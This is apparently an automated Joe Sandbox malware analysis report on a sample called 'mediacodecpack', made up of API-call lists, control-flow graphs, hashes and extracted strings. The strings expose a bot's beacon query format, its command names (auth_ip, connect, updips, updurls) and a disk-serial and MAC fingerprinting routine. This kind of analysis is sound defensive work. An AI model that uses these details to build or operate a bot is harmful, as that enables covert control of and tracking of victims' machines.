61435->61416 61435->61428 61436->61437 61438 b0fb20 Mailbox 68 API calls 61437->61438 61438->61435 61439->61428 61440->61428 61441->61429 61442->61404 61443->61407 61445 b02de4 61444->61445 61446 b02dca 61444->61446 61448 b02dfc 61445->61448 61450 b02def 61445->61450 61447 b0fb20 Mailbox 68 API calls 61446->61447 61452 b02dcf 61447->61452 61458 b02d39 WSASetLastError WSASend 61448->61458 61451 b0fb20 Mailbox 68 API calls 61450->61451 61451->61452 61452->61009 61453 b02e54 WSASetLastError select 61454 b0950d 69 API calls 61453->61454 61456 b02e0c 61454->61456 61455 b0fb20 68 API calls Mailbox 61455->61456 61456->61452 61456->61453 61456->61455 61457 b02d39 71 API calls 61456->61457 61457->61456 61459 b0950d 69 API calls 61458->61459 61460 b02d6e 61459->61460 61461 b02d82 61460->61461 61462 b02d75 61460->61462 61464 b02d7a 61461->61464 61465 b0fb20 Mailbox 68 API calls 61461->61465 61463 b0fb20 Mailbox 68 API calls 61462->61463 61463->61464 61466 b02d9c 61464->61466 61467 b0fb20 Mailbox 68 API calls 61464->61467 61465->61464 61466->61456 61467->61466 61468 4021bb 61469 4021c8 61468->61469 61470 402223 CopyFileA 61469->61470 61472 402171 61469->61472 61473 4021e0 61469->61473 61470->61472 61471 40d955 OpenSCManagerA 61471->61472 61472->61471 61474 40e09b 61472->61474 61475 401b7c 61476 402277 RegQueryValueExA 61475->61476 61478 b3c80e 61479 b3c812 61478->61479 61482 b0e9ab LoadLibraryA 61479->61482 61480 b3c817 61480->61480 61483 b0e9d4 GetProcAddress 61482->61483 61484 b0ea8e 61482->61484 61485 b0ea87 FreeLibrary 61483->61485 61488 b0e9e8 61483->61488 61484->61480 61485->61484 61486 b0e9fa GetAdaptersInfo 61486->61488 61487 b0ea82 61487->61485 61488->61486 61488->61487 61489 b127c5 _Allocate 60 API calls 61488->61489 61489->61488 61490 b0104d 61491 b123b4 __cinit 68 API calls 61490->61491 61492 b01057 61491->61492 61495 b01aa9 InterlockedIncrement 61492->61495 61496 b01ac5 WSAStartup InterlockedExchange 61495->61496 61497 b0105c 61495->61497 61496->61497 61498 4022ff 61499 4022fe 61498->61499 61499->61498 61500 40d0b4 RegCloseKey 61499->61500

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.NTDLL(00B34FD0), ref: 00B05E92
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 00B05EA9
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EB2
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 00B05EC1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EC4
                                                                                        • GetTickCount.KERNEL32 ref: 00B05ED8
                                                                                          • Part of subcall function 00B059FA: _malloc.LIBCMT ref: 00B05A08
                                                                                        • GetVersionExA.KERNEL32(00B34E20), ref: 00B05F05
                                                                                        • _malloc.LIBCMT ref: 00B05F31
                                                                                          • Part of subcall function 00B11FBC: __FF_MSGBANNER.LIBCMT ref: 00B11FD3
                                                                                          • Part of subcall function 00B11FBC: __NMSG_WRITE.LIBCMT ref: 00B11FDA
                                                                                          • Part of subcall function 00B11FBC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 00B11FFF
                                                                                        • _malloc.LIBCMT ref: 00B05F41
                                                                                        • _malloc.LIBCMT ref: 00B05F4C
                                                                                        • _malloc.LIBCMT ref: 00B05F57
                                                                                        • _malloc.LIBCMT ref: 00B05F62
                                                                                        • _malloc.LIBCMT ref: 00B05F6D
                                                                                        • _malloc.LIBCMT ref: 00B05F78
                                                                                        • _malloc.LIBCMT ref: 00B05F84
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00B05F9B
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FA4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FB0
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FB3
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FBE
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FC1
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B05FF8
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06005
                                                                                        • _malloc.LIBCMT ref: 00B06026
                                                                                        • _malloc.LIBCMT ref: 00B06034
                                                                                        • _malloc.LIBCMT ref: 00B0603B
                                                                                        • _malloc.LIBCMT ref: 00B0605C
                                                                                        • QueryPerformanceCounter.KERNEL32(00000200), ref: 00B06068
                                                                                        • Sleep.KERNELBASE(00000000), ref: 00B06076
                                                                                        • _malloc.LIBCMT ref: 00B06082
                                                                                        • _malloc.LIBCMT ref: 00B06092
                                                                                        • Sleep.KERNELBASE(0000EA60), ref: 00B06104
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B0610F
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06120
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat$vZ_
                                                                                        • API String ID: 4273019447-198802956
                                                                                        • Opcode ID: 1945daca0701249a6653d6ca1ecca060697b475809d521d1bb18ba7637410ab3
                                                                                        • Instruction ID: dee37b33783081be53da282c83ad118760777b1af12fe1cb96e0442fddf07b7b
                                                                                        • Opcode Fuzzy Hash: 1945daca0701249a6653d6ca1ecca060697b475809d521d1bb18ba7637410ab3
                                                                                        • Instruction Fuzzy Hash: E871F3B19083809FD320AF38AC46F9F7BE8AF45710F14096DF68897392DFB459458B96

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 546 b0e9ab-b0e9ce LoadLibraryA 547 b0e9d4-b0e9e2 GetProcAddress 546->547 548 b0ea8e-b0ea95 546->548 549 b0ea87-b0ea88 FreeLibrary 547->549 550 b0e9e8-b0e9f8 547->550 549->548 551 b0e9fa-b0ea06 GetAdaptersInfo 550->551 552 b0ea08 551->552 553 b0ea3e-b0ea46 551->553 554 b0ea0a-b0ea11 552->554 555 b0ea48-b0ea4e call b126df 553->555 556 b0ea4f-b0ea54 553->556 557 b0ea13-b0ea17 554->557 558 b0ea1b-b0ea23 554->558 555->556 560 b0ea82-b0ea86 556->560 561 b0ea56-b0ea59 556->561 557->554 563 b0ea19 557->563 564 b0ea26-b0ea2b 558->564 560->549 561->560 562 b0ea5b-b0ea60 561->562 566 b0ea62-b0ea6a 562->566 567 b0ea6d-b0ea78 call b127c5 562->567 563->553 564->564 568 b0ea2d-b0ea3a call b0e6fa 564->568 566->567 567->560 573 b0ea7a-b0ea7d 567->573 568->553 573->551
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00B0E9C1
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00B0E9DA
                                                                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 00B0E9FF
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B0EA88
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                        • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                        • API String ID: 514930453-3114217049
                                                                                        • Opcode ID: 4887b410d0bbfc53179e643b7f8e6434b0b3a01e9ccc4bd859913c1d0b562632
                                                                                        • Instruction ID: 52dc60678f6d7e395743583a73ef5fbe27805b10651a89a7ea7a59734c93daac
                                                                                        • Opcode Fuzzy Hash: 4887b410d0bbfc53179e643b7f8e6434b0b3a01e9ccc4bd859913c1d0b562632
                                                                                        • Instruction Fuzzy Hash: 5221A571B002099BCB20DBA89884AEEBFF8FF09310F1444E9E558E7281DB30DD45C7A4

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 590 b02b95-b02baf 591 b02bb1-b02bb9 call b0fb20 590->591 592 b02bc7-b02bcb 590->592 600 b02bbf-b02bc2 591->600 594 b02bcd-b02bd0 592->594 595 b02bdf 592->595 594->595 597 b02bd2-b02bdd call b0fb20 594->597 598 b02be2-b02c11 WSASetLastError WSARecv call b0950d 595->598 597->600 602 b02c16-b02c1d 598->602 603 b02d30 600->603 605 b02c2c-b02c32 602->605 606 b02c1f-b02c2a call b0fb20 602->606 607 b02d32-b02d38 603->607 609 b02c34-b02c39 call b0fb20 605->609 610 b02c46-b02c48 605->610 615 b02c3f-b02c42 606->615 609->615 613 b02c4a-b02c4d 610->613 614 b02c4f-b02c60 call b0fb20 610->614 617 b02c66-b02c69 613->617 614->607 614->617 615->610 619 b02c73-b02c76 617->619 620 b02c6b-b02c6d 617->620 619->603 623 b02c7c-b02c9a call b0fb20 call b0166f 619->623 620->619 622 b02d22-b02d2d call b01996 620->622 622->603 630 b02cbc-b02cfa WSASetLastError select call b0950d 623->630 631 b02c9c-b02cba call b0fb20 call b0166f 623->631 637 b02d08 630->637 638 b02cfc-b02d06 call b0fb20 630->638 631->603 631->630 640 b02d15-b02d17 637->640 641 b02d0a-b02d12 call b0fb20 637->641 645 b02d19-b02d1d 638->645 640->603 640->645 641->640 645->598
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02BE4
                                                                                        • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 00B02C07
                                                                                          • Part of subcall function 00B0950D: WSAGetLastError.WS2_32(00000000,?,?,00B02A51), ref: 00B0951B
                                                                                        • WSASetLastError.WS2_32 ref: 00B02CD3
                                                                                        • select.WS2_32(?,?,00000000,00000000,00000000), ref: 00B02CE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Recvselect
                                                                                        • String ID: 3'
                                                                                        • API String ID: 886190287-280543908
                                                                                        • Opcode ID: af923168e95d2733f46d9e61ce04da4b2a8ebdeb435feaa7b67777a452dc1431
                                                                                        • Instruction ID: 96f30f256472b4a9c947c62b4aefe0fc73509705403c427426cde74c0cadc78c
                                                                                        • Opcode Fuzzy Hash: af923168e95d2733f46d9e61ce04da4b2a8ebdeb435feaa7b67777a452dc1431
                                                                                        • Instruction Fuzzy Hash: 20419EB05043019FD720AF64C85976BBFE8EF84354F1049AEE895C76D1EB70D8498B91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 647 b0e8a7-b0e8d2 CreateFileA 648 b0e9a3-b0e9aa 647->648 649 b0e8d8-b0e8ed 647->649 650 b0e8f0-b0e912 DeviceIoControl 649->650 651 b0e914-b0e91c 650->651 652 b0e94b-b0e953 650->652 653 b0e925-b0e92a 651->653 654 b0e91e-b0e923 651->654 655 b0e955-b0e95b call b126df 652->655 656 b0e95c-b0e95e 652->656 653->652 660 b0e92c-b0e934 653->660 654->652 655->656 658 b0e960-b0e963 656->658 659 b0e999-b0e9a2 CloseHandle 656->659 662 b0e965-b0e96e GetLastError 658->662 663 b0e97f-b0e98c call b127c5 658->663 659->648 664 b0e937-b0e93c 660->664 662->659 665 b0e970-b0e973 662->665 663->659 671 b0e98e-b0e994 663->671 664->664 667 b0e93e-b0e94a call b0e6fa 664->667 665->663 668 b0e975-b0e97c 665->668 667->652 668->663 671->650
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00B0E8C6
                                                                                        • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 00B0E904
                                                                                        • GetLastError.KERNEL32 ref: 00B0E965
                                                                                        • CloseHandle.KERNELBASE(?), ref: 00B0E99C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                        • String ID: \\.\PhysicalDrive0
                                                                                        • API String ID: 4026078076-1180397377
                                                                                        • Opcode ID: 4a718df410f9bb2a17f85b5b875f241fd4334e316f743e1b04f5a9fd8b564499
                                                                                        • Instruction ID: 81a910fe0e74bcca47dacb7be929953f9a3160532f7bf7c43c6487eee1664c60
                                                                                        • Opcode Fuzzy Hash: 4a718df410f9bb2a17f85b5b875f241fd4334e316f743e1b04f5a9fd8b564499
                                                                                        • Instruction Fuzzy Hash: 7831A271D00219EBCB24DF99DC84AAEBFF8EF45710F2045AEE515A7280DB709E05CBA0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.NTDLL(00B34FD0), ref: 00B05E92
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 00B05EA9
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EB2
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 00B05EC1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EC4
                                                                                        • GetTickCount.KERNEL32 ref: 00B05ED8
                                                                                        • GetVersionExA.KERNEL32(00B34E20), ref: 00B05F05
                                                                                        • _malloc.LIBCMT ref: 00B05F31
                                                                                        • _malloc.LIBCMT ref: 00B05F41
                                                                                        • _malloc.LIBCMT ref: 00B05F4C
                                                                                        • _malloc.LIBCMT ref: 00B05F57
                                                                                        • _malloc.LIBCMT ref: 00B05F62
                                                                                        • _malloc.LIBCMT ref: 00B05F6D
                                                                                        • _malloc.LIBCMT ref: 00B05F78
                                                                                        • _malloc.LIBCMT ref: 00B05F84
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00B05F9B
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FA4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FB0
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FB3
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FBE
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat$vZ_
                                                                                        • API String ID: 2374473808-198802956
                                                                                        • Opcode ID: 0e614427cd153a1f00e898d42650300a3997a02cf9d948799dbd077ef53cfda0
                                                                                        • Instruction ID: ba1582ed7252187a4fb51f0009f9df4e19a82a7ebc2cf3d906504cc6ea268bbd
                                                                                        • Opcode Fuzzy Hash: 0e614427cd153a1f00e898d42650300a3997a02cf9d948799dbd077ef53cfda0
                                                                                        • Instruction Fuzzy Hash: BEA136719083409FD320AF78AC45B9BBBE4AF59310F5409AEF688D7292DF749806CBD5

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 74 b05e26-b05e29 75 b05e75-b05ec4 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 74->75 76 b05e2b-b05e3b 74->76 77 b05ecb-b060f2 GetTickCount call b059fa GetVersionExA call b13760 call b11fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call b13760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call b11fbc * 4 QueryPerformanceCounter Sleep call b11fbc * 2 call b13760 * 2 75->77 78 b05ec6 call b042c7 75->78 82 b05dc5-b05dcf 76->82 83 b05e3d-b05e3e 76->83 146 b060f4-b060f9 77->146 147 b060fb-b060fd 77->147 78->77 85 b05d94-b05da9 82->85 83->75 86 b05dbf-b05dc2 85->86 88 b05d61-b05d78 86->88 89 b05dc4-b05dcf 86->89 92 b05d7a-b05d8e 88->92 93 b05d0b-b05d15 88->93 89->85 95 b05d18-b05d1e 92->95 96 b05d90 92->96 93->95 97 b05d92 96->97 98 b05dea-b05dec 96->98 97->85 100 b05e6d-b05ec6 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call b042c7 98->100 101 b05def-b05df7 98->101 100->77 101->86 104 b05df9 101->104 107 b05dfa-b05e0e 104->107 109 b05e10-b05e17 107->109 110 b05dd4 107->110 113 b05dd6-b05ddf 110->113 114 b05e49-b05e5d 110->114 113->107 119 b05de1-b05de4 113->119 119->98 150 b06104 Sleep 146->150 148 b0610a-b06139 RtlEnterCriticalSection RtlLeaveCriticalSection 147->148 149 b060ff 147->149 151 b0613d-b06161 148->151 149->150 150->148 153 b06163-b06174 151->153 154 b060f5-b060f9 151->154 153->151 154->150
                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.NTDLL(00B34FD0), ref: 00B05E92
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 00B05EA9
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EB2
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 00B05EC1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EC4
                                                                                        • GetTickCount.KERNEL32 ref: 00B05ED8
                                                                                        • GetVersionExA.KERNEL32(00B34E20), ref: 00B05F05
                                                                                        • _malloc.LIBCMT ref: 00B05F31
                                                                                        • _malloc.LIBCMT ref: 00B05F41
                                                                                        • _malloc.LIBCMT ref: 00B05F4C
                                                                                        • _malloc.LIBCMT ref: 00B05F57
                                                                                        • _malloc.LIBCMT ref: 00B05F62
                                                                                        • _malloc.LIBCMT ref: 00B05F6D
                                                                                        • _malloc.LIBCMT ref: 00B05F78
                                                                                        • _malloc.LIBCMT ref: 00B05F84
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00B05F9B
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FA4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FB0
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FB3
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FBE
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat$vZ_
                                                                                        • API String ID: 2374473808-198802956
                                                                                        • Opcode ID: 47a569bfe83c3dfadf1be9d427a4329d06f232b7dfe9eadfc3700e47bfccd247
                                                                                        • Instruction ID: f29d3c9468351a9bc7caa4a2ecdf8b5489369182596a8bd0e42aaf7148e84e52
                                                                                        • Opcode Fuzzy Hash: 47a569bfe83c3dfadf1be9d427a4329d06f232b7dfe9eadfc3700e47bfccd247
                                                                                        • Instruction Fuzzy Hash: 1D71F6B18083909FD320AF78AC45B9B7FE4AF56300F14089DF58897392DFB45946CB96

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 210 b0640b-b06448 211 b06464-b0646e 210->211 212 b0644a-b06450 210->212 213 b060f0-b060f2 211->213 214 b06474-b06498 call b13760 call b0439c 211->214 215 b06452-b06454 212->215 216 b06456-b06463 call b0534d 212->216 219 b060f4-b060f9 213->219 220 b060fb-b060fd 213->220 214->213 232 b0649e-b064c9 RtlEnterCriticalSection RtlLeaveCriticalSection call b1134c 214->232 215->211 216->211 225 b06104 Sleep 219->225 222 b0610a-b06139 RtlEnterCriticalSection RtlLeaveCriticalSection 220->222 223 b060ff 220->223 226 b0613d-b06161 222->226 223->225 225->222 230 b06163-b06174 226->230 231 b060f5-b060f9 226->231 230->226 231->225 235 b06513-b0652b call b1134c 232->235 236 b064cb-b064da call b1134c 232->236 241 b06531-b06533 235->241 242 b067d2-b067e1 call b1134c 235->242 236->235 243 b064dc-b064eb call b1134c 236->243 241->242 245 b06539-b065e4 call b11fbc RtlEnterCriticalSection RtlLeaveCriticalSection call b13760 * 5 call b0439c * 2 241->245 251 b067e3-b067e5 242->251 252 b06826-b06835 call b1134c 242->252 243->235 250 b064ed-b064fc call b1134c 243->250 297 b06621 245->297 298 b065e6-b065e8 245->298 250->235 265 b064fe-b0650d call b1134c 250->265 251->252 256 b067e7-b06821 call b13760 RtlEnterCriticalSection RtlLeaveCriticalSection 251->256 263 b06837 call b05c11 252->263 264 b0684a-b06859 call b1134c 252->264 256->213 272 b0683c-b06845 call b05d1f 263->272 264->213 277 b0685f-b06861 264->277 265->213 265->235 272->213 277->213 280 b06867-b06880 call b0439c 277->280 280->213 286 b06886-b06955 call b11428 call b01ba7 280->286 295 b06957 call b0143f 286->295 296 b0695c-b0697d RtlEnterCriticalSection 286->296 295->296 301 b06989-b069f0 RtlLeaveCriticalSection call b03c67 call b03d7e call b0733f 296->301 302 b0697f-b06986 296->302 299 b06625-b06653 call b11fbc call b13760 call b0439c 297->299 298->297 303 b065ea-b065fc call b1134c 298->303 321 b06694-b0669d call b11f84 299->321 322 b06655-b06664 call b125f6 299->322 323 b069f6-b06a38 call b09729 301->323 324 b06b58-b06b6c call b08007 301->324 302->301 303->297 310 b065fe-b0661f call b0439c 303->310 310->299 335 b067c0-b067cd 321->335 336 b066a3-b066bb call b127c5 321->336 322->321 337 b06666 322->337 333 b06b22-b06b53 call b073ee call b033b2 323->333 334 b06a3e-b06a45 323->334 324->213 333->324 339 b06a48-b06a4d 334->339 335->213 349 b066c7 336->349 350 b066bd-b066c5 call b0873b 336->350 341 b0666b-b0667d call b11860 337->341 339->339 344 b06a4f-b06a94 call b09729 339->344 352 b06682-b06692 call b125f6 341->352 353 b0667f 341->353 344->333 358 b06a9a-b06aa0 344->358 351 b066c9-b06757 call b09853 call b03863 call b05119 call b03863 call b09af9 call b09c13 349->351 350->351 378 b0675c-b0676d 351->378 352->321 352->341 353->352 362 b06aa3-b06aa8 358->362 362->362 364 b06aaa-b06ae5 call b09729 362->364 364->333 370 b06ae7-b06b21 call b0c11b 364->370 370->333 379 b06774-b0679f Sleep call b10900 378->379 380 b0676f call b0380b 378->380 384 b067a1-b067aa call b04100 379->384 385 b067ab-b067b9 379->385 380->379 384->385 385->335 387 b067bb call b0380b 385->387 387->335
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(0000EA60), ref: 00B06104
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B0610F
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06120
                                                                                          • Part of subcall function 00B127C5: _malloc.LIBCMT ref: 00B127DD
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B064A3
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B064B4
                                                                                        • _malloc.LIBCMT ref: 00B0653B
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B0654D
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06559
                                                                                        • _malloc.LIBCMT ref: 00B0662A
                                                                                        • _strtok.LIBCMT ref: 00B0665B
                                                                                        • _swscanf.LIBCMT ref: 00B06672
                                                                                        • _strtok.LIBCMT ref: 00B06689
                                                                                        • _free.LIBCMT ref: 00B06695
                                                                                        • Sleep.KERNEL32(000007D0), ref: 00B06779
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B067FF
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06811
                                                                                          • Part of subcall function 00B0873B: __EH_prolog.LIBCMT ref: 00B08740
                                                                                          • Part of subcall function 00B0873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 00B087BB
                                                                                          • Part of subcall function 00B0873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 00B087D9
                                                                                        • _sprintf.LIBCMT ref: 00B0689B
                                                                                        • RtlEnterCriticalSection.NTDLL(00000020), ref: 00B06960
                                                                                        • RtlLeaveCriticalSection.NTDLL(00000020), ref: 00B06994
                                                                                          • Part of subcall function 00B05C11: _malloc.LIBCMT ref: 00B05C1F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                        • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                        • API String ID: 753742866-2823103634
                                                                                        • Opcode ID: 82d25da30ca7329b5888b2c88be42b3f34131e7c28032d4e2c516c98bb99ca2c
                                                                                        • Instruction ID: 0b97b5ff12135e4a84c4426a3fdf017e8d9bc416e22946631ce48653363a7229
                                                                                        • Opcode Fuzzy Hash: 82d25da30ca7329b5888b2c88be42b3f34131e7c28032d4e2c516c98bb99ca2c
                                                                                        • Instruction Fuzzy Hash: 341210722083819FD3349B24D852BAFBBE4EF86710F1448ADF589972D2EF709945CB52

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B01D11
                                                                                        • GetLastError.KERNEL32 ref: 00B01D23
                                                                                          • Part of subcall function 00B01712: __EH_prolog.LIBCMT ref: 00B01717
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B01D59
                                                                                        • GetLastError.KERNEL32 ref: 00B01D6B
                                                                                        • __beginthreadex.LIBCMT ref: 00B01DB1
                                                                                        • GetLastError.KERNEL32 ref: 00B01DC6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B01DDD
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B01DEC
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00B01E14
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B01E1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                        • String ID: thread$thread.entry_event$thread.exit_event
                                                                                        • API String ID: 831262434-3017686385
                                                                                        • Opcode ID: f981165149560189aaf44e35c3ea152e94e71390406e8f5aa4e240c79d7dd4fa
                                                                                        • Instruction ID: 7efffc41cb8992f231c5c5d10934b0000113d5d3c2d65fccef4ead96663f93e1
                                                                                        • Opcode Fuzzy Hash: f981165149560189aaf44e35c3ea152e94e71390406e8f5aa4e240c79d7dd4fa
